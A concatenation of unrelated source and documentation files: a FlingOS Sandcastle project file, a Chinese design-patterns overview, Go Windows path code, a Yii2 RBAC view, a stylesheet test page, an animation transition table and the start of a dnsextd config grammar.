<NamespaceSummaryItem name="Drivers.Compiler.App" isDocumented="True">Contains the command-line application and related classes which provide a command line interface to the Drivers Compiler. It is the primary point of invocation for the Drivers Compiler.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.Architectures.x86" isDocumented="True">Contains namespaces and classes for targetting the x86 (32 bit) processor architecture.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.Architectures.x86.ASMOps" isDocumented="True">Contains classes representing all the x86 operations used by the compiler when targetting the x86 (32-bit) architecture.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.ASM" isDocumented="True">Contains the framework for converting IL ops into ASM code and compiling that ASM code into machine code.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.Attributes" isDocumented="True">Contains attribute classes used by the compiler for identification of key classes and methods within the operating system code, such as the entrypoint and garbage collector methods.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.IL" isDocumented="True">Contains the framework for reading IL bytes, representation of IL ops and the construction and manipulation of IL methods, type tables and related aspects.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.IL.ILOps" isDocumented="True">Contains classes representing all the IL ops supported by the compiler. The classes give the root operation and list support for variants. The IL op classes are base classes containing abstract Preprocess and Convert methods which, when overridden, handle conversion of IL ops into ASM ops.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.MSBuildTask" isDocumented="True">Contains the build task implementation and related classes which provide an interface for MSBuild to the Drivers Compiler. It is a primary point of invocation for the Drivers Compiler when using automated compilation through MSBuild.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.Types" isDocumented="True">Contains classes and framework for reading an IL library and scanning the contained types for classes, methods, structures, enumerations, properties, etc. etc.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Framework" isDocumented="True">Provides a basic framework for all C# drivers to link against.</NamespaceSummaryItem>
<NamespaceSummaryItem name="ISO9660Generator" isDocumented="True">The ISO9660 Generator application is a wrapper app for Mosa's ISO9660 Generator library.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core.Processes" isDocumented="True">Contains classes related to loading and management of processes at a high-level.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core.Processes.ELF" isDocumented="True">Contains classes for loading, initialising and starting ELF executables (either as drivers or user-mode apps).</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core.Tasks" isDocumented="True">Contains specific implementations of Tasks which are built-in sub-processes of the main kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.ISO9660" isDocumented="True">Classes for handling an ISO9660 file system.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.Streams.ISO9660" isDocumented="True">Classes for handling ISO9660 streams such as ISO9660 file streams.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.Processes.Synchronisation" isDocumented="True">Contains implementations of widely needed synchronisation primitives such as spin-locks.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.IO.Serial" isDocumented="True">Contains classes for handling Serial ports.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Processes" isDocumented="True">Contains classes for managing processes and threads including scheduling.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Processes.IPC" isDocumented="True">Contains classes for managing inter-process communication that goes via the kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Processes.Synchronisation" isDocumented="True">Contains implementations of synchronisation primitives (that are not needed by FOS_System level classes) such as mutexes.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Tasks" isDocumented="True">Contains specific implementations of Tasks which are related directly to the hardware or hardware classes; They are built-in sub-processes of the main kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Testing" isDocumented="True">Contains classes for testing aspects of the hardware drivers.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Shared" isDocumented="True">Shared between the kernel and drivers. Contains definitions which must be the same for both kernel and drivers (such as system call numbers).</NamespaceSummaryItem>
<NamespaceSummaryItem name="TestDriver" isDocumented="True">A sample driver for testing against. Does very little but useful for testing Kernel's ELF loading and ABI.</NamespaceSummaryItem>
<NamespaceSummaryItem name="KernelABI" isDocumented="True">Contains classes for driver or application side access to the Kernel's Application Binary Interface.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.Architectures.MIPS32" isDocumented="True">Contains namespaces and classes for targetting the MIPS (32 bit) processor architecture.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.Architectures.MIPS32.ASMOps" isDocumented="True">Contains classes representing all the MIPS operations used by the compiler when targetting the MIPS (32-bit) architecture.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.ASM.ASMOps" isDocumented="True">Contains base class ASM ops for identifying types of ASM ops within target architecture libraries.</NamespaceSummaryItem>
<NamespaceSummaryItem name="FlingOops" isDocumented="True">The cross-platform compiler verification kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="FlingOops.x86" isDocumented="True">x86-specific implementations for supporting the testing framework.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Exceptions" isDocumented="True">Contains exceptions used by the hardware drivers.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Debugger" isDocumented="True">Contains the portable, supporting classes for the debugger.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Debugger.App" isDocumented="True">Contains the GUI application and related classes which provide a Windows Forms-based graphical interface to the Debugger in the kernel. It is the primary point of invocation for the Debugger.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Framework.Utilities" isDocumented="True">Utility classes for the drivers framework.</NamespaceSummaryItem>
<NamespaceSummaryItem name="FlingOops.Utilities" isDocumented="True">Utility classes used by the testing kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Consoles" isDocumented="True">Contains specific implementations of the Console class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Pipes" isDocumented="True">Contains classes for managing Piped IPC.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Pipes.Exceptions" isDocumented="True">Contains classes for exceptions thrown in Piped IPC.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Pipes.Standard" isDocumented="True">Contains classes for implementig Standard pipes for Piped IPC.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Processes" isDocumented="True">Contains classes related to loading and management of processes at a high-level.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Processes.ELF" isDocumented="True">Contains classes for loading, initialising and starting ELF executables (either as drivers or user-mode apps).</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Shells" isDocumented="True">Contains specific implementations of the Shell class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Tasks" isDocumented="True">Contains specific implementations of Tasks which are built-in sub-processes of the main kernel.</NamespaceSummaryItem></NamespaceSummaries>
<ApiFilter>
<Filter entryType="Namespace" fullName="" isExposed="False" />
<Filter entryType="Namespace" fullName="Kernel.Debug" isExposed="False" /></ApiFilter>
<FeedbackEMailLinkText>Edward Nutting - Project Founder</FeedbackEMailLinkText>
<FeedbackEMailAddress>flingos%40outlook.com</FeedbackEMailAddress>
<CopyrightText>FlingOS™ Copyright Edward Nutting 2014-15 under GPLv2</CopyrightText>
<SccProjectName>SAK</SccProjectName>
<SccProvider>SAK</SccProvider>
<SccAuxPath>SAK</SccAuxPath>
<SccLocalPath>SAK</SccLocalPath>
<RootNamespaceTitle>FlingOS</RootNamespaceTitle>
<CopyrightHref>http://www.flingos.co.uk/License</CopyrightHref>
<FooterText>If you find any issues with the documentation, please log them here: &lt%3ba href=&quot%3bhttps://bitbucket.org/flingos/fling-os/issues&quot%3b&gt%3bProject Issue Tracker&lt%3b/a&gt%3b&lt%3bbr/&gt%3b&lt%3bbr/&gt%3b</FooterText>
</PropertyGroup>
<!-- There are no properties for these groups. AnyCPU needs to appear in order for Visual Studio to perform
the build. The others are optional common platform types that may appear. -->
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x86' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x64' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x64' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|Win32' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|Win32' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)' == 'Docs' ">
<OutputPath>bin\Docs\</OutputPath>
</PropertyGroup>
<ItemGroup>
<Folder Include="icons\" />
<Folder Include="Specs" />
<Folder Include="Conceptual" />
<Folder Include="Conceptual\Kernel Compiler" />
<Folder Include="Conceptual\Kernel Compiler\Architecture" />
<Folder Include="Conceptual\Kernel" />
<Folder Include="Conceptual\Kernel Debugger\" />
<Folder Include="Conceptual\Kernel\Handling CS Standard Libraries" />
</ItemGroup>
<ItemGroup>
<None Include="Docs.licenseheader" />
<None Include="Conceptual\Kernel Compiler\Architecture\Processing Flow Details.aml" />
<None Include="Conceptual\Kernel\Handling CS Standard Libraries\Approach 1 - DIY.aml" />
<None Include="Conceptual\Kernel\Handling CS Standard Libraries\Approach 2 - Plugs.aml" />
<None Include="Conceptual\Kernel\Kernel.aml" />
<None Include="Specs\XML Comment Specifications.aml" />
</ItemGroup>
<ItemGroup>
<Content Include="icons\FlingOS-Logo-Blue.png">
<ImageId>FlingOS-Logo-Blue</ImageId>
<AlternateText>FlingOS-Logo-Blue</AlternateText>
</Content>
<Image Include="Conceptual\Kernel Compiler\Architecture\Fling OS - Kernel Compiler Model 1.png">
<ImageId>Fling OS - Kernel Compiler Model 1</ImageId>
<AlternateText>Fling OS - Kernel Compiler Model 1</AlternateText>
</Image>
<Image Include="Conceptual\Kernel Debugger\Fling OS - Debug Architecture.png">
<ImageId>Fling OS - Debug Architecture</ImageId>
<AlternateText>Fling OS - Debug Architecture</AlternateText>
</Image>
</ItemGroup>
<!-- Import the SHFB build targets -->
<Import Project="$(SHFBROOT)\SandcastleHelpFileBuilder.targets" />
</Project> | {
"pile_set_name": "Github"
} |
## 设计模式
> 设计模式(Design pattern)代表了最佳的实践,通常被有经验的面向对象的软件开发人员所采用。设计模式是软件开发人员在软件开发过程中面临的一般问题的解决方案。这些解决方案是众多软件开发人员经过相当长的一段时间的试验和错误总结出来的。
设计模式是一套被反复使用的、多数人知晓的、经过分类编目的、代码设计经验的总结。使用设计模式是为了重用代码、让代码更容易被他人理解、保证代码可靠性。 毫无疑问,设计模式于己于他人于系统都是多赢的,设计模式使代码编制真正工程化,设计模式是软件工程的基石,如同大厦的一块块砖石一样。项目中合理地运用设计模式可以完美地解决很多问题,每种模式在现实中都有相应的原理来与之对应,每种模式都描述了一个在我们周围不断重复发生的问题,以及该问题的核心解决方案,这也是设计模式能被广泛应用的原因
### 设计模式的类型
根据设计模式的参考书 **Design Patterns - Elements of Reusable Object-Oriented Software(中文译名:设计模式 - 可复用的面向对象软件元素)** 中所提到的,总共有 23 种设计模式。这些模式可以分为三大类:创建型模式(Creational Patterns)、结构型模式(Structural Patterns)、行为型模式(Behavioral Patterns)
| 序号 | 模式 & 描述 | 包括 |
| ---- | ------------------------------------------------------------ | ------------------------------------------------------------ |
| 1 | **创建型模式** 这些设计模式提供了一种在创建对象的同时隐藏创建逻辑的方式,而不是使用 new 运算符直接实例化对象。这使得程序在判断针对某个给定实例需要创建哪些对象时更加灵活。 | 工厂模式(Factory Pattern)抽象工厂模式(Abstract Factory Pattern)单例模式(Singleton Pattern)建造者模式(Builder Pattern)原型模式(Prototype Pattern) |
| 2 | **结构型模式** 这些设计模式关注类和对象的组合。继承的概念被用来组合接口和定义组合对象获得新功能的方式。 | 适配器模式(Adapter Pattern)桥接模式(Bridge Pattern)过滤器模式(Filter、Criteria Pattern)组合模式(Composite Pattern)装饰器模式(Decorator Pattern)外观模式(Facade Pattern)享元模式(Flyweight Pattern)代理模式(Proxy Pattern) |
| 3 | **行为型模式** 这些设计模式特别关注对象之间的通信。 | 责任链模式(Chain of Responsibility Pattern)命令模式(Command Pattern)解释器模式(Interpreter Pattern)迭代器模式(Iterator Pattern)中介者模式(Mediator Pattern)备忘录模式(Memento Pattern)观察者模式(Observer Pattern)状态模式(State Pattern)空对象模式(Null Object Pattern)策略模式(Strategy Pattern)模板模式(Template Pattern)访问者模式(Visitor Pattern) |
### 设计模式的六大原则
**1、开闭原则(Open Close Principle)**
开闭原则的意思是:**对扩展开放,对修改关闭**。在程序需要进行拓展的时候,不能去修改原有的代码,实现一个热插拔的效果。简言之,是为了使程序的扩展性好,易于维护和升级。想要达到这样的效果,我们需要使用接口和抽象类,
> 实现热插拔,提高扩展性。
**2、里氏代换原则(Liskov Substitution Principle)**
里氏代换原则是面向对象设计的基本原则之一。 里氏代换原则中说,任何基类可以出现的地方,子类一定可以出现。LSP 是继承复用的基石,只有当派生类可以替换掉基类,且软件单位的功能不受到影响时,基类才能真正被复用,而派生类也能够在基类的基础上增加新的行为。里氏代换原则是对开闭原则的补充。实现开闭原则的关键步骤就是抽象化,而基类与子类的继承关系就是抽象化的具体实现,所以里氏代换原则是对实现抽象化的具体步骤的规范。
> 实现抽象的规范,实现子父类互相替换;
**3、依赖倒转原则(Dependence Inversion Principle)**
这个原则是开闭原则的基础,具体内容:针对接口编程,依赖于抽象而不依赖于具体。
> 针对接口编程,实现开闭原则的基础;
**4、接口隔离原则(Interface Segregation Principle)**
这个原则的意思是:使用多个隔离的接口,比使用单个接口要好。它还有另外一个意思是:降低类之间的耦合度。由此可见,其实设计模式就是从大型软件架构出发、便于升级和维护的软件设计思想,它强调降低依赖,降低耦合。
> 降低耦合度,接口单独设计,互相隔离;
**5、迪米特法则,又称最少知道原则(Demeter Principle)**
最少知道原则是指:一个实体应当尽量少地与其他实体之间发生相互作用,使得系统功能模块相对独立。
> 功能模块尽量独立
**6、合成复用原则(Composite Reuse Principle)**
合成复用原则是指:尽量使用合成/聚合的方式,而不是使用继承。
> 尽量使用聚合,组合,而不是继承; | {
"pile_set_name": "Github"
} |
// Copyright 2010 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package filepath
import (
"strings"
"syscall"
)
func isSlash(c uint8) bool {
return c == '\\' || c == '/'
}
// IsAbs reports whether the path is absolute.
func IsAbs(path string) (b bool) {
l := volumeNameLen(path)
if l == 0 {
return false
}
path = path[l:]
if path == "" {
return false
}
return isSlash(path[0])
}
// volumeNameLen returns length of the leading volume name on Windows.
// It returns 0 elsewhere.
func volumeNameLen(path string) int {
if len(path) < 2 {
return 0
}
// with drive letter
c := path[0]
if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') {
return 2
}
// is it UNC
if l := len(path); l >= 5 && isSlash(path[0]) && isSlash(path[1]) &&
!isSlash(path[2]) && path[2] != '.' {
// first, leading `\\` and next shouldn't be `\`. its server name.
for n := 3; n < l-1; n++ {
// second, next '\' shouldn't be repeated.
if isSlash(path[n]) {
n++
// third, following something characters. its share name.
if !isSlash(path[n]) {
if path[n] == '.' {
break
}
for ; n < l; n++ {
if isSlash(path[n]) {
break
}
}
return n
}
break
}
}
}
return 0
}
// HasPrefix exists for historical compatibility and should not be used.
func HasPrefix(p, prefix string) bool {
if strings.HasPrefix(p, prefix) {
return true
}
return strings.HasPrefix(strings.ToLower(p), strings.ToLower(prefix))
}
func splitList(path string) []string {
// The same implementation is used in LookPath in os/exec;
// consider changing os/exec when changing this.
if path == "" {
return []string{}
}
// Split path, respecting but preserving quotes.
list := []string{}
start := 0
quo := false
for i := 0; i < len(path); i++ {
switch c := path[i]; {
case c == '"':
quo = !quo
case c == ListSeparator && !quo:
list = append(list, path[start:i])
start = i + 1
}
}
list = append(list, path[start:])
// Remove quotes.
for i, s := range list {
if strings.Contains(s, `"`) {
list[i] = strings.Replace(s, `"`, ``, -1)
}
}
return list
}
func abs(path string) (string, error) {
return syscall.FullPath(path)
}
func join(elem []string) string {
for i, e := range elem {
if e != "" {
return joinNonEmpty(elem[i:])
}
}
return ""
}
// joinNonEmpty is like join, but it assumes that the first element is non-empty.
func joinNonEmpty(elem []string) string {
if len(elem[0]) == 2 && elem[0][1] == ':' {
// First element is drive letter without terminating slash.
// Keep path relative to current directory on that drive.
return Clean(elem[0] + strings.Join(elem[1:], string(Separator)))
}
// The following logic prevents Join from inadvertently creating a
// UNC path on Windows. Unless the first element is a UNC path, Join
// shouldn't create a UNC path. See golang.org/issue/9167.
p := Clean(strings.Join(elem, string(Separator)))
if !isUNC(p) {
return p
}
// p == UNC only allowed when the first element is a UNC path.
head := Clean(elem[0])
if isUNC(head) {
return p
}
// head + tail == UNC, but joining two non-UNC paths should not result
// in a UNC path. Undo creation of UNC path.
tail := Clean(strings.Join(elem[1:], string(Separator)))
if head[len(head)-1] == Separator {
return head + tail
}
return head + string(Separator) + tail
}
// isUNC reports whether path is a UNC path.
func isUNC(path string) bool {
return volumeNameLen(path) > 2
}
func sameWord(a, b string) bool {
return strings.EqualFold(a, b)
}
| {
"pile_set_name": "Github"
} |
/*!
@file
@copyright Edouard Alligand and Joel Falcou 2015-2017
(See accompanying file LICENSE.md or copy at http://boost.org/LICENSE_1_0.txt)
*/
#ifndef BRIGAND_HPP_INCLUDED
#define BRIGAND_HPP_INCLUDED
#include <brigand/adapted.hpp>
#include <brigand/algorithms.hpp>
#include <brigand/functions.hpp>
#include <brigand/sequences.hpp>
#include <brigand/types.hpp>
#endif
| {
"pile_set_name": "Github"
} |
<?php
use yii\helpers\Html;
use backend\modules\rbac\AdminAsset;
use yii\helpers\Json;
use yii\helpers\Url;
/* @var $this yii\web\View */
/* @var $model yii\web\IdentityInterface */
$this->title = Yii::t('rbac-admin', 'Assignments');
$this->params['breadcrumbs'][] = $this->title;
?>
<div class="assignment-index">
<?= Html::a(Yii::t('rbac-admin', 'Users'), ['index'], ['class' => 'btn btn-success']) ?>
<h1><?= Yii::t('rbac-admin', 'User') ?>: <?= Html::encode($model->{$usernameField}) ?></h1>
<div class="row">
<div class="col-lg-5">
<div class="input-group">
<span class="input-group-addon"><?= Yii::t('rbac-admin', 'Avaliable') ?>:</span>
<input type="text" class="form-control" id="search-avaliable" placeholder="Search">
</div>
<select class="form-control" id="list-avaliable" multiple size="20" style="width: 100%">
</select>
</div>
<div class="col-lg-1">
<br><br>
<a href="#" id="btn-assign" class="btn btn-success">>></a><br>
<a href="#" id="btn-revoke" class="btn btn-danger"><<</a>
</div>
<div class="col-lg-5">
<div class="input-group">
<span class="input-group-addon"><?= Yii::t('rbac-admin', 'Assigned') ?>:</span>
<input type="text" class="form-control" id="search-assigned" placeholder="Search">
</div>
<select class="form-control" id="list-assigned" multiple size="20" style="width: 100%">
</select>
</div>
</div>
</div>
<?php
AdminAsset::register($this);
$properties = Json::htmlEncode([
'userId' => $model->{$idField},
'assignUrl' => Url::to(['assign']),
'searchUrl' => Url::to(['search']),
]);
$js = <<<JS
yii.admin.initProperties({$properties});
$('#search-avaliable').keydown(function () {
yii.admin.searchAssignmet('avaliable');
});
$('#search-assigned').keydown(function () {
yii.admin.searchAssignmet('assigned');
});
$('#btn-assign').click(function () {
yii.admin.assign('assign');
return false;
});
$('#btn-revoke').click(function () {
yii.admin.assign('revoke');
return false;
});
yii.admin.searchAssignmet('avaliable', true);
yii.admin.searchAssignmet('assigned', true);
JS;
$this->registerJs($js);
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<!-- default -->
<html>
<head>
<meta charset="UTF-8">
<title>Test alternative stylesheets</title>
<link rel="stylesheet" href="persistent.css">
<link rel="stylesheet" title="Default" href="default.css">
<link rel="stylesheet" title="Default" href="default2.css">
<link rel="stylesheet alternate" title="Alternative" href="alternative.css">
<link rel="stylesheet alternate" title="Alternative" href="alternative2.css">
<style>
#internal { background: yellow; }
</style>
</head>
<body>
<blockquote id="persistent">persistent</blockquote>
<blockquote id="default">default</blockquote>
<blockquote id="default2">default2</blockquote>
<blockquote id="alternative">alternative</blockquote>
<blockquote id="alternative2">alternative2</blockquote>
<blockquote id="internal">internal</blockquote>
</body>
</html>
| {
"pile_set_name": "Github"
} |
Role State Target TransitionDuration
R2AilaMd010011 Born 0
R2AilaMd010011 Stand2 0.1
R2AilaMd010011 Stand1 0.1
R2AilaMd010011 Stand3 0.1
R2AilaMd010011 Standchange 0.1
R2AilaMd010011 Run 0.1
R2AilaMd010011 Walk 0.1
R2AilaMd010011 Death 0.1
R2AilaMd010011 Hit1 0.05
R2AilaMd010011 Hit2 0.05
R2AilaMd010011 Behitfly 0.05
R2AilaMd010011 Hoverhit 0.05
R2AilaMd010011 Falldown 0.1
R2AilaMd010011 Hitdown 0.1
R2AilaMd010011 Lieonfloor 0.1
R2AilaMd010011 Standup 0.1
R2AilaMd010011 Straight 0.1
R2AilaMd010011 Stun 0.1
R2AilaMd010011 TurnLeft 0.1
R2AilaMd010011 TurnRight 0.1
R2AilaMd010011 StraightBefore 0.1
R2AilaMd010011 StraightAfter 0.1
R2AilaMd010011 UiStand1 0.1
R2AilaMd010011 Win 0
R2AilaMd010011 Win2 0.1
R2AilaMd010011 Runb 0.2
R2AilaMd010011 Runl 0.2
R2AilaMd010011 Runr 0.2
R2AilaMd010011 Stop 0.1
R2AilaMd010011 Walkb 0.1
R2AilaMd010011 Walkl 0.1
R2AilaMd010011 Walkr 0.1
R2AilaMd010011 Fail 0.1
R2AilaMd010011 Save 0.1
R2AilaMd010011 Hit3 0.05
R2AilaMd010011 Hit4 0.05
R2AilaMd010011 RunStart 0.1
R2AilaMd010011 RunStartEnd01 0.1
R2AilaMd010011 Attack01 0.1
R2AilaMd010011 Attack02 0.1
R2AilaMd010011 Attack03 0.1
R2AilaMd010011 Attack04 0.1
R2AilaMd010011 Attack11 0.1
R2AilaMd010011 Attack21 0.1
R2AilaMd010011 Attack31 0.1
R2AilaMd010011 Attack41 0.1
R2AilaMd010011 Attack51 0.1
R2AilaMd010011 Move1 0.1
R2AilaMd010011 Move2 0.1
R2AilaMd010011 Move3 0.1
R2AilaMd010011 AttackQte 0
R2AilaMd010011 Stand2 Standchange 0.1
R2AilaMd010011 Stand2 Run 0.2
R2AilaMd010011 Stand2 Walk 0.3
R2AilaMd010011 Stand2 Walkb 0.3
R2AilaMd010011 Stand2 Walkl 0.3
R2AilaMd010011 Stand2 Walkr 0.3
R2AilaMd010011 Stand1 Run 0.2
R2AilaMd010011 Stand1 Walk 0.1
R2AilaMd010011 Standchange Stand1 0.1
R2AilaMd010011 Standchange Run 0.1
R2AilaMd010011 Standchange Walk 0.1
R2AilaMd010011 Run Stop 0.2
R2AilaMd010011 Run Stand2 0.2
R2AilaMd010011 Run Runb 0.2
R2AilaMd010011 Run Runl 0.2
R2AilaMd010011 Run Runr 0.2
R2AilaMd010011 Walk Stand2 0.1
R2AilaMd010011 Hit1 Stand2 0
R2AilaMd010011 Hit2 Stand2 0
R2AilaMd010011 Behitfly Hoverhit 0.1
R2AilaMd010011 Behitfly Falldown 0.1
R2AilaMd010011 Hoverhit Falldown 0.1
R2AilaMd010011 Falldown Lieonfloor 0.1
R2AilaMd010011 Hitdown Lieonfloor 0.1
R2AilaMd010011 Standup Stand2 0.1
R2AilaMd010011 Straight Stand2 0.1
R2AilaMd010011 Stun Stand2 0.1
R2AilaMd010011 TurnLeft Stand2 0.1
R2AilaMd010011 TurnRight Stand2 0.1
R2AilaMd010011 Win Win2 0.1
R2AilaMd010011 Runb Stand2 0.2
R2AilaMd010011 Runb Run 0.2
R2AilaMd010011 Runb Runl 0.2
R2AilaMd010011 Runb Runr 0.2
R2AilaMd010011 Runl Stand2 0.2
R2AilaMd010011 Runl Run 0.2
R2AilaMd010011 Runl Runb 0.2
R2AilaMd010011 Runl Runr 0.2
R2AilaMd010011 Runr Stand2 0.2
R2AilaMd010011 Runr Run 0.2
R2AilaMd010011 Runr Runb 0.2
R2AilaMd010011 Runr Runl 0.2
R2AilaMd010011 Stop Stand2 0.1
R2AilaMd010011 Walkb Stand2 0.1
R2AilaMd010011 Walkb Walk 0.2
R2AilaMd010011 Walkb Walkl 0.1
R2AilaMd010011 Walkb Walkr 0.1
R2AilaMd010011 Walkl Stand2 0.1
R2AilaMd010011 Walkl Walk 0.1
R2AilaMd010011 Walkl Walkb 0.1
R2AilaMd010011 Walkl Walkr 0.2
R2AilaMd010011 Walkr Stand2 0.1
R2AilaMd010011 Walkr Walk 0.1
R2AilaMd010011 Walkr Walkb 0.1
R2AilaMd010011 Walkr Walkl 0.2
R2AilaMd010011 Hit3 Stand2 0
R2AilaMd010011 Hit4 Stand2 0
R2AilaMd010011 RunStart Run 0
R2AilaMd010011 RunStart RunStartEnd01 0.1
| {
"pile_set_name": "Github"
} |
/* -*- Mode: C; tab-width: 4 -*-
*
* Copyright (c) 2006-2010 Apple Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
%{
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "mDNSEmbeddedAPI.h"
#include "DebugServices.h"
#include "dnsextd.h"
void yyerror( const char* error );
int yylex(void);
typedef struct StringListElem
{
char * string;
struct StringListElem * next;
} StringListElem;
typedef struct OptionsInfo
{
char server_address[ 256 ];
int server_port;
char source_address[ 256 ];
int source_port;
int private_port;
int llq_port;
} OptionsInfo;
typedef struct ZoneInfo
{
char name[ 256 ];
char certificate_name[ 256 ];
char allow_clients_file[ 256 ];
char allow_clients[ 256 ];
char key[ 256 ];
} ZoneInfo;
typedef struct KeySpec
{
char name[ 256 ];
char algorithm[ 256 ];
char secret[ 256 ];
struct KeySpec * next;
} KeySpec;
typedef struct ZoneSpec
{
char name[ 256 ];
DNSZoneSpecType type;
StringListElem * allowUpdate;
StringListElem * allowQuery;
char key[ 256 ];
struct ZoneSpec * next;
} ZoneSpec;
static StringListElem * g_stringList = NULL;
static StringListElem * g_addrList = NULL;
static KeySpec * g_keys;
static ZoneSpec * g_zones;
static ZoneSpec g_zoneSpec;
static const char * g_filename;
#define YYPARSE_PARAM context
void
SetupOptions
(
OptionsInfo * info,
void * context
);
%}
%union
{
int number;
char * string;
}
%token OPTIONS
%token LISTEN_ON
%token NAMESERVER
%token PORT
%token ADDRESS
%token LLQ
%token PUBLIC
%token PRIVATE
%token ALLOWUPDATE
%token ALLOWQUERY
%token KEY
%token ALGORITHM
%token SECRET
%token ISSUER
%token SERIAL
%token ZONE
%token TYPE
%token ALLOW
%token OBRACE
%token EBRACE
%token SEMICOLON
%token IN
%token <string> DOTTED_DECIMAL_ADDRESS
%token <string> WILDCARD
%token <string> DOMAINNAME
%token <string> HOSTNAME
%token <string> QUOTEDSTRING
%token <number> NUMBER
%type <string> addressstatement
%type <string> networkaddress
%%
commands:
|
commands command SEMICOLON
;
command:
options_set
|
zone_set
|
key_set
;
options_set:
OPTIONS optionscontent
{
// SetupOptions( &g_optionsInfo, context );
}
;
optionscontent:
OBRACE optionsstatements EBRACE
;
optionsstatements:
|
optionsstatements optionsstatement SEMICOLON
;
optionsstatement:
statements
|
LISTEN_ON addresscontent
{
}
|
LISTEN_ON PORT NUMBER addresscontent
{
mDNSIPPort listen_port = mDNSOpaque16fromIntVal( $3 );
DaemonInfo* d = ( DaemonInfo* ) context;
d->addr.sin_port = ( listen_port.NotAnInteger) ? listen_port.NotAnInteger : UnicastDNSPort.NotAnInteger;
StringListElem* addr = g_addrList;
while (addr != NULL)
{
StringListElem* next;
// The first ipv4 address in {,} is used; the rest are ignored.
if (inet_pton( AF_INET, addr->string, &d->addr.sin_addr ) == 0) {
inet_pton( AF_INET, "127.0.0.1", &d->ns_addr.sin_addr );
LogMsg("LISTEN_ON: An invalid ipv4 address, %s, detected.", addr->string);
}
next = addr->next;
free(addr);
addr = next;
}
}
|
NAMESERVER ADDRESS networkaddress
{
}
|
NAMESERVER ADDRESS networkaddress PORT NUMBER
{
}
|
PRIVATE PORT NUMBER
{
( ( DaemonInfo* ) context )->private_port = mDNSOpaque16fromIntVal( $3 );
}
|
LLQ PORT NUMBER
{
( ( DaemonInfo* ) context )->llq_port = mDNSOpaque16fromIntVal( $3 );
}
;
key_set:
KEY QUOTEDSTRING OBRACE SECRET QUOTEDSTRING SEMICOLON EBRACE
{
KeySpec * keySpec;
keySpec = ( KeySpec* ) malloc( sizeof( KeySpec ) );
if ( !keySpec )
{
LogMsg("ERROR: memory allocation failure");
YYABORT;
}
strncpy( keySpec->name, $2, sizeof( keySpec->name ) );
strncpy( keySpec->secret, $5, sizeof( keySpec->secret ) );
keySpec->next = g_keys;
g_keys = keySpec;
}
;
zone_set:
ZONE QUOTEDSTRING zonecontent
{
ZoneSpec * zoneSpec;
zoneSpec = ( ZoneSpec* ) malloc( sizeof( ZoneSpec ) );
if ( !zoneSpec )
{
